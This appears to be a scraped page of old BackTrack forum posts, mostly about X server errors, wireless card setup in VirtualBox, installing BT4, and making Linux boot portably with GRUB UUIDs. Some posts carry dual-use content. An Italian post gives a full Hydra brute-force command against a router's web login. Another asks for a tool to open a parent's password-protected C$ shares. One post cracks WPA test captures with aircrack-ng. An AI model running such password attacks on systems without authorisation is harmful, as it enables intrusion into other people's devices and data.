Primary device is not PCI
(EE) Mo devices detected.
Fatal server error:
no screens found
giving up.
xinit: Connection refused (errno 111): unable to connect to X server
xinit: No such process (errno 3): Server error.
root@bt:~#
My laptop is not a scrappy one
Intel(R) Core (TM)2 Quad CPU @ 2.83GHz
RAM 3 GB
NVIDIA GeForce 9800 GTX x2
Now im running Win7 32-bit system
Please help!!!Sorry for my bed englishTags: quot server error x-protocol fatal-server-error priority-1 BackTrack Howto
-
BT4 Wireless problem
» remote-exploit & backtrackOk I loaded BT4 on VirtualBOX it doesn't recognise my wireless card in "lspci" but when I type "dhclient eth0" it works, internet works, the only thing is BT sees it as a wired network and not a wireless network but that's not the problem, when I restart and boot with the CD before installing it it sees my wireless card in "lspci" but dhclient woun't work, nothing woun't work
when I type : /etc/init.d/networking start it saies "Failed to bring up wlan0"
and if I type dhclient wlan0 it just stays and sais "DHCLIENT on wlan0 from 255.255.255.255 interval XX"
A little help here ?Tags: quot type dhclient virtualbox bt4 interval BackTrack Howto
-
Access C:/ drive via shared folder.....? How???
» remote-exploit & backtrackIn my home's local network I can see my dad's PC folders but I can (unfortunately) access only his shared folders.However I can see his drives (C$ etc).When I try to access them password key is required :(:(:(:(:(
Any tool that let me access these folders without knowing the passskey?:D:D;)?
snapshot at:
h t t p : / /img199.imageshack.us/img199/513/snapshot1ax.pngTags: access img snapshot shared-folders access-c c-drive BackTrack Howto
-
[Video] How to: Install BackTrack 4 (Final) {in VirtualBox }
» remote-exploit & backtrackWhat is this?
This video shows how to install BackTrack 4 (Final) in VirtualBox, as well as applying a few tweaks and updating it. You can also use this method to install BackTrack on a real machine, just skip out the first part.
What do I need?
> BackTrack 4 (Final) (bt4-final.iso MD5: af139d2a085978618dc53cabc67b9269)
> VirtualBox
Links
Stream Video: How to: Install BackTrack 4 (Final) in VirtualBox
Download Video: Install BT4[Final] [HD].mp4
Commands: Bash pastebin - collaborative debugging tool
Software
Name: BackTrack
Version: 4 (Final)
Home Page: BackTrack Linux
Download Link: Downloads
Name: VirtualBox
Version: 3.1.2
Home Page: VirtualBox
Download Link: http://download.virtualbox.org/virtu...-56127-Win.exe
Commands:
Code:fix-splash800
bash /media/cdrom0/VBoxLinuxAdditions-x86.run
nano /root/.bash_profile
start-network
startx
apt-get -y update
apt-get -y upgrade
apt-get update && apt-get dist-upgrade -y
/pentest/exploits/fast-track.py -i
apt-get install crark
apt-get install wbox
apt-get install vlc
Notes:
This could take a while, depending on your computer's speed & internet connection. You may have your own tweaks you want to apply - these are just mine.
~g0tmi1kTags: virtualbox collaborative-debugging-tool pentest BackTrack Howto
-
Give me a BT4-beta.vmx file for edimax 7318 USG
» remote-exploit & backtrackHi folks, i am trying to make BT4 PREf work ona vm player,it does but all it shows in iwconfig is
lo-no wireless extentions
eth0- ni wireless extentions
Networking is up and mozilla opens any page on the internet well, but no wlan0 in iwconfig or any other possibility to start airmon/crack.
Intereasting is with the live cd booted on the laptop it works like charm, JTR,cowpatty aircrack.
I have searched for answers on the forum and turned it upside down but... nothing.
I appreciate your help and wissh you all a nice linux.... i mean night :)
viliamTags: beta vmx iwconfig aircrack extentions hi-folks BackTrack Howto
-
HYDRA Bruteforce attack
» remote-exploit & backtrackCiao amici
vi faccio vedere un semplice attacco verso un router usando Hydra , questo avviene tramite console non GUI.
* apri la console e scrivi:
# hydra -l "admin" - P wordlist.txt -vV -s 80 -f 192.168.1.1 http-get /
Spiegazione:
la ( -l ) rappresenta (admin) la grande parte dei router hanno Admin come username, per essere sicuri google la marca del tuo router.
la ( -P ) e' per il password list ( se la tua password list ha un nome diverso, cambia Wordlist.txt con la tua)
la ( -vV ) fa' vedere il login e password ad ogni prova. in piu
usa un modo insistente .
la ( -s ) rappresenta la porta da attaccare, i routers comunicono tramite porta 80.
la ( -f ) serve a Hydra di finire il lavoro appena ha trovato la combinazione.
la ( / ) finale non sono sicuro ma durante i test che ho fatto dovevo metterla per forza.
*** Se la password si trova nel tuo passlist, Hydra all fine ti dara' la combinazione : User + Password.
Buon Divertimento
GDTags: password hydra router porta-80 bruteforce-attack google tutorial Howto
-
Linux on the go!
» remote-exploit & backtrackOK so I was heading away on holidays and I wanted to keep my luggage to a minimum. I didn't want to bring my laptop with me, but I still wanted to have full access to all my files, my programs, my entire operating system.
So I figured hey, I can take the hard disk out of my laptop, stick it in a USB enclosure, and then just bring the hard disk around with me. The idea was I could take my hard disk and connect it into any computer and then just boot off it.
Before I went away, my Grub entry for booting Linux was as follows:
Code:title Main Linux OSSo I went away on holidays and I hooked my hard disk up to a computer via USB and then booted off it. The Grub menu appeared, and I simply hit Enter to boot into Linux. It booted up fine and everything worked.
root (hd0,2)
kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
But with some computers, there was complications.
If you look at my Grub entry above, you'll see that it makes two references to the partition on which Linux resides:
Reference 1: (hd0,2)
Reference 2: /dev/sda3
The first reference never seems to cause any problems, reason being that "hd0" will always refer to the hard disk which Grub has just booted off (or at least that's how it seems).
The second reference however can cause problems. On some of the computers I used, the Grub menu appeared, I hit Enter, and then Linux failed to load. The problem was that my own hard disk was being given the designation of sdb instead of sda. I had a workaround for this. When the Grub menu appeared, I would press E to edit the entry, and I would change the following line:
Code:kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sda3 ro quiet splashto:
Code:kernel /boot/vmlinuz-2.6.31-17-generic root=/dev/sdb3 ro quiet splashAfter I made that change, I pressed B to boot up Linux, and it booted up fine. (I didn't need to change root (hd0,2) to root (hd1,2)).
Here's what my fstab file looked like:
Code:proc /proc proc defaults 0 0As you can see, my Linux partition was referred to as "/dev/sda3" in my fstab file. Even on the computers where my hard disk was designated as sdb at boot-time, this fstab entry didn't cause any problems (you'd think I would have had to change it to sdb!). Even though my own Linux partition was designated as sdb3 at boot-time, it appears as though it was known as sda3 by the time it came to mounting the root filesystem. (Don't ask me, I haven't got a clue either).
/dev/sda3 / ext3 relatime,errors=remount-ro 0 1
I wanted to find the best way of making my Linux installation fully portable so that I could bring my hard disk around and boot it on different computers.
...and that's when I discovered UUID's :cool:
UUID's solve the problem of hard disks being given different designations on different systems (e.g. sda VS sdb VS sdc). Every Linux partition (e.g. ext2 ext3 ext4) has its own unique UUID. You can use this UUID to refer to the partition instead of using "/dev/sda3". To make use of UUID's, I had to change two files on my hard disk: my Grub file and my fstab file. I changed them as follows.
Here's my Grub file:
Code:title Main Linux OSAnd here's my fstab:
uuid 8c5055d5-75e5-5f57-9585-5a5525551524
kernel /boot/vmlinuz-2.6.31-17-generic root=UUID=8c5055d5-75e5-5f57-9585-5a5525551524 ro quiet splash
initrd /boot/initrd.img-2.6.31-17-generic
quiet
Code:proc /proc proc defaults 0 0After I made those changes, it booted every time on every computer. Notice, in these two files, that there's no reference to the hard disk number or even the partition number. You can move this Linux partition around however you like, you can change the partition order on your current hard disk, or you can move the Linux partition to a different hard disk. Your Linux installation should still boot right away without a problem because it's working off the UUID of the partition.
UUID=8c5055d5-75e5-5f57-9585-5a5525551524 / ext3 relatime,errors=remount-ro 0 1
Anyway I thought this was pretty cool when I got it working right, and I just had to share it... this is the kind of stuff that makes me really love Linux :rolleyes:
If you wanna find out the UUID's of your partitions, do the following:
Code:sudo blkid | sortAlso, another little cool thing I found is the "/dev/disk" folder. Navigate into that folder and take a look around!Tags: nbsp disk linux don linux-os usb-enclosure grub BackTrack Howto
-
BackTrack 4 Final: how to compile aircrack-ng with sqlite support
» remote-exploit & backtrackdownload aircrack-ng-1.0.tar.gz
# tar xfz aircrack-ng-1.0.tar.gz
# cd aircrack-ng-1.0
# cd test
# aircrack-ng -r passphrases.db wpa.cap
You should get KEY FOUND! [ biscotte ]
# aircrack-ng -r passphrases.db wpa2.eapol.cap
You should get KEY FOUND! [ 12345678 ]
If you get "Error: Aircrack-ng wasn't compiled with sqlite support"
proceed to below steps:
# cd aircrack-ng-1.0
# make clean
# make sqlite=true
# make sqlite=true install
Now run:
# aircrack-ng -r passphrases.db wpa.cap
You should get KEY FOUND! [ biscotte ]Tags: sqlite tar wpa biscotte cd-test BackTrack Howto
-
wiki italiana
» remote-exploit & backtrackho sentito tempo fa di un progetto su una wiki italiana su backtrack, cira un annetto fa.......
mi sorprendo che non ci sia nemmeno una bozza online......
comunque un certo xseris ho visto che due giorni fa si è aperto lui una wiki curata da se in attesa di quella ufficiale, sempre che non sia saltata.......
a me personalmente sembra stia nascendo veramente bene almeno nei fondamentali dei singoli tools....
è sviluppata in una sola pagina il che all'inizio mi è sembrato abbastanza strano, ma a pensarci bene secondo me ha fatto bene, forse sarà che è bella da vedere o la facilità di gestione, ma questo non importa....
be pensavo solo potesse interessare, io pensavo di unirmi adirittura al suo pregetto, boh vedrò come la svilupperà.....
se mi consentite posto il link per questa wiki....Tags: wiki una che tempo-fa bozza BackTrack tutorial Howto
-
How to set up my Wireless USB card BT4
» remote-exploit & backtrackOk I have a SMC - SMCWUSB-G Wireless usb card.
I checked the tested wireless cards and drivers for BT on :
hxxp://backtrack.offensive-security.com/index.php?title=HCL:Wireless#SMCWUSB-G_EU
and I found my card there. The problem is it automaticly works in BT3 but not in BT4.
When I type in lspci it sees the card but somehow I can't enable it.
Tried "iwconfig", "dhclient", "airmon-ng start"Tags: quot card Wireless hxxp bt3 wireless-cards BackTrack Howto
-
How to set up my Wireless USB card BT4
» remote-exploit & backtrackOk I have a SMC - SMCWUSB-G Wireless usb card.
I checked the tested wireless cards and drivers for BT on :
hxxp://backtrack.offensive-security.com/index.php?title=HCL:Wireless#SMCWUSB-G_EU
and I found my card there. The problem is it automaticly works in BT3 but not in BT4.
When I type in lspci it sees the card but somehow I can't enable it.
Tried "iwconfig", "dhclient", "airmon-ng start"Tags: quot card Wireless hxxp bt3 wireless-cards BackTrack Howto